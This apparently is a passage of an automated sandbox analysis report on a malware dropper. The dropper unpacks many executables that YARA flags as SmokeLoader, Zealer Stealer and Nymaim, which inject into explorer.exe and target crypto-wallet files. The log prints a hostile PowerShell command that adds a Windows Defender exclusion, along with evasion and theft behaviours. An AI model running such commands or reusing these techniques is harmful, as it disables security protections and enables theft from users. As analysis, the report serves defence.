                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeMemory allocated: page read and write | page guardJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_0040115C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_cexit,_amsg_exit,_initterm,GetStartupInfoA,_initterm,exit,5_2_0040115C
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_0040C5AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,5_2_0040C5AC
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_0040C5B0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,5_2_0040C5B0
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_00401150 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_cexit,5_2_00401150
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_004013C9 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_cexit,_amsg_exit,_initterm,5_2_004013C9
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exeCode function: 14_2_0042808F SetUnhandledExceptionFilter,__encode_pointer,14_2_0042808F
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exeCode function: 14_2_004280B1 __decode_pointer,SetUnhandledExceptionFilter,14_2_004280B1
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exeCode function: 14_2_00427428 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00427428
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exeCode function: 14_2_00423599 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_00423599
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exeCode function: 14_2_0041D773 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_0041D773

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Maps a DLL or memory area into another process
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829254ab49d_fc210c4a.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829254ab49d_fc210c4a.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                    Creates a thread in another existing process (thread injection)
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829254ab49d_fc210c4a.exeThread created: C:\Windows\explorer.exe EIP: 2741A50
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp"
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp"Jump to behavior
                    Source: C:\Users\user\Desktop\T4IoJqcAwY.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exe "C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 6282924fea1c3_82ebfc59.exe Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 628292505a6c3_91a0215e.exe Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 62829251169ea_9dc91d.exe Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 62829252dc457_91e450cbce.exe Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 62829254ab49d_fc210c4a.exe Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 6282925776f05_4ee107b.exe Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 62829258f111c_8df26f0c7d.exe /mixtwoJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 6282925ab52f1_fdd12e5.exe Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 6282925b8abce_97dd7946.exe Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 6282925c504be_44b654a9fe.exe Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 6282925d5ee10_0da12a.exe Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 6282925ea53e7_da60dc03.exe Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exe 6282924fea1c3_82ebfc59.exe Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exe 62829251169ea_9dc91d.exe Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829252dc457_91e450cbce.exe 62829252dc457_91e450cbce.exe Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exe "C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exe" -hJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829254ab49d_fc210c4a.exe 62829254ab49d_fc210c4a.exe Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925776f05_4ee107b.exe 6282925776f05_4ee107b.exe
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829258f111c_8df26f0c7d.exe 62829258f111c_8df26f0c7d.exe /mixtwo
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925776f05_4ee107b.exeProcess created: unknown unknown
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925ab52f1_fdd12e5.exe 6282925ab52f1_fdd12e5.exe
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829258f111c_8df26f0c7d.exeProcess created: unknown unknown
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829258f111c_8df26f0c7d.exeProcess created: unknown unknown
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925b8abce_97dd7946.exe 6282925b8abce_97dd7946.exe
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925c504be_44b654a9fe.exe 6282925c504be_44b654a9fe.exe
                    Source: 62829258f111c_8df26f0c7d.exe, 00000016.00000000.371003856.0000000004AAE000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: F.program managerguage
                    Source: 62829258f111c_8df26f0c7d.exe, 00000016.00000000.371003856.0000000004AAE000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: program manager
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,14_2_00402D2B
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exeCode function: GetLocaleInfoA,14_2_0042C650
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,14_2_004308CC
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829252dc457_91e450cbce.exeCode function: GetUserDefaultUILanguage,GetLocaleInfoW,16_2_0040B044
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829252dc457_91e450cbce.exeCode function: GetLocaleInfoW,16_2_0041E034
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829252dc457_91e450cbce.exeCode function: GetLocaleInfoW,16_2_0041E080
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829252dc457_91e450cbce.exeCode function: GetLocaleInfoW,16_2_004AF218
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829252dc457_91e450cbce.exeCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,16_2_0040A4CC
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeQueries volume information: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829258f111c_8df26f0c7d.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exeCode function: 14_2_0042BBD7 cpuid 14_2_0042BBD7
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_0040C500 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,5_2_0040C500
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exeCode function: 14_2_0042A006 __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,14_2_0042A006
                    Source: C:\Users\user\Desktop\T4IoJqcAwY.exeCode function: 0_2_00401951 GetVersionExW,0_2_00401951

                    Stealing of Sensitive Information

                    barindex
                    Yara detected SmokeLoader
                    Source: Yara matchFile source: 18.2.62829254ab49d_fc210c4a.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 18.3.62829254ab49d_fc210c4a.exe.2cf0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 18.2.62829254ab49d_fc210c4a.exe.2ce0e67.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000012.00000002.555317118.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.555585024.0000000002D21000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002B.00000000.512324401.0000000002741000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.315223819.0000000002CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Yara detected Zealer Stealer
                    Source: Yara matchFile source: Process Memory Space: 6282924fea1c3_82ebfc59.exe PID: 3600, type: MEMORYSTR
                    Yara detected Nymaim
                    Source: Yara matchFile source: 22.3.62829258f111c_8df26f0c7d.exe.4810000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.0.62829258f111c_8df26f0c7d.exe.2d10e67.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.0.62829258f111c_8df26f0c7d.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.0.62829258f111c_8df26f0c7d.exe.2d10e67.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.0.62829258f111c_8df26f0c7d.exe.400000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.0.62829258f111c_8df26f0c7d.exe.400000.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.0.62829258f111c_8df26f0c7d.exe.400000.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.0.62829258f111c_8df26f0c7d.exe.2d10e67.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.0.62829258f111c_8df26f0c7d.exe.2d10e67.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.0.62829258f111c_8df26f0c7d.exe.400000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.0.62829258f111c_8df26f0c7d.exe.400000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.0.62829258f111c_8df26f0c7d.exe.400000.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.0.62829258f111c_8df26f0c7d.exe.2d10e67.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.0.62829258f111c_8df26f0c7d.exe.2d10e67.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.0.62829258f111c_8df26f0c7d.exe.2d10e67.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.0.62829258f111c_8df26f0c7d.exe.400000.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.0.62829258f111c_8df26f0c7d.exe.2d10e67.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.0.62829258f111c_8df26f0c7d.exe.400000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000016.00000000.329990024.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000000.333254439.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000000.332457104.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000000.373439148.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000003.319416057.0000000004810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000000.367298393.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000000.336022265.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000000.369246590.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000000.371676239.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
                    Found many strings related to Crypto-Wallets (likely being stolen)
                    Source: 6282924fea1c3_82ebfc59.exe, 0000000B.00000002.649500041.0000000002451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum
                    Source: 6282924fea1c3_82ebfc59.exe, 0000000B.00000002.649500041.0000000002451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: JaxxClassic
                    Source: 6282924fea1c3_82ebfc59.exe, 0000000B.00000002.649500041.0000000002451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet
                    Source: 6282924fea1c3_82ebfc59.exe, 0000000B.00000002.649500041.0000000002451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Jaxx\Local Storage\leveldb
